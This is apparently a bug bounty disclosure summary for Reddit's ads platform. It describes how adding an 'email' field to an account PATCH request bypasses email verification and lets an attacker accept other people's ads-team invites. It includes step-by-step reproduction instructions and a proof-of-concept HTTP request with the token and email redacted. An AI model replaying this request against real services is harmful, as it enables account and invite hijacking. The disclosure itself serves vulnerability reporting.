The reporter discovered they were able to hijack invites to other ads teams by adding the extra field, email, to a request that would allow them to bypass email verification. By doing so they were able to accept invites to ads teams on behalf of others and assume the role of the invitee with their own account.
A snippet of the PoC is included in this summary below.
___
Steps to reproduce
1. Create an account with any email you wish from https://ads.reddit.com
2. Don’t verify your email
3. Go to https://ads.reddit.com/account/account_id/inventory-type and set any value to capture the request .
4. Change your email to any arbitrary email.
5. Your email will be “verified” and you will be able to accept invites sent to the target email if that email had an invite to an ads team.
“`
PATCH /api/v2.0/accounts/ HTTP/2
Host: ads-api.reddit.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ads.reddit.com/
Authorization Bearer: ????????
Content-Type: application/json
Origin: https://ads.reddit.com
Content-Length: 101
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Cache-Control: max-age=0
Te: trailers
{“data”:{“brand_safety_tier_preference”:”EXPANDED”,
“email”:”?????”
}}
“`